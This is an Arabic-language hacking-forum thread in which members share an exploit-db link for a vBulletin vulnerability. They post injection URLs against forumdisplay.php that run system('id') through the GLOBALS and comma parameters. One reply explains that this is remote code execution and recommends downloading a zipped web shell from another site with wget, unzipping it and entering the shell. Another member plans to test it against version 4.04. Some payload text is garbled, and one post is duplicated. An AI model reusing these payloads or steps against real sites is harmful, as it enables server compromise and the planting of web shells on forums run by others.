الحققققق ثغرة جديده بمنتديات vb

[حربي هكر]

السلام عليكم .. اعضاء العناكب .. من خلال تصحفي بموقع الاكسبلويت

حصل ثغرة .. شكلي اول مافتحت على الموقع توه منزله ثغرة مصابه فيها منتديات vb

لاتفوووتكم . ألثغرة الحقوووووا .. عليها هذا رابط الثغرررررة

http://www.exploit-db.com/exploits/14686/

 

[GuEvArA511]

مشكور ثغرة من جد طازة

بس نبي شرح كيف تستغلالها لاهنت

اذا تعرف ولا اي واحد من الشباب يشرحها لنا

هذي هي استغلالاتها لكن مافهمت شي

http://DNSname.com/patch/clientscript/vbulletin-core.js?v=
 
http://DNSname.com/patch/clientscript/vbulletin-core.js?v=(value)
 
http://DNSname.com/vb/forumdisplay.php?GLOBALS[]=
 
http://DNSname.com/patch/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."
 
http://DNSname.com/vb/forumdisplay.php?GLOBALS[]=1&f=2&comma=content-type=".allow put chart

 

[dz-fox]

مشكور ثغرة من جد طازة

بس نبي شرح كيف تستغلالها لاهنت

اذا تعرف ولا اي واحد من الشباب يشرحها لنا

هذي هي استغلالاتها لكن مافهمت شي

http://DNSname.com/patch/clientscript/vbulletin-core.js?v=
 
http://DNSname.com/patch/clientscript/vbulletin-core.js?v=(value)
 
http://DNSname.com/vb/forumdisplay.php?GLOBALS[]=
 
http://DNSname.com/patch/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."
 
http://DNSname.com/vb/forumdisplay.php?GLOBALS[]=1&f=2&comma=content-type=".allow put chart

عزيزي هذه تغرة Code Execution يعني تقدر تطبق أوامر التي تستعملها في الشل في رابط الموقع مباشرة

يعني مثلا http://DNSname.com/patch/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."

بهذا سيظهر لك في الموقع صلاحياتك على السيرفر لأننا ادرجنا الأمر id

افضل الطرق انك تسحب شل من موقع آخر برابط مباشر بصيغة zip (مضغوط) بالأمر wget

و تفك الضغط الضغط بالأمر unzip و تدخل على الشل و smilies12

 

[ارساوي]

يعطيك العافية

 

[المخترق الصغير]

مشكور اخي الثغرة في الاصدار 4.04 نجرب و نعود ان كانت فعالة ام لا...شكرا لك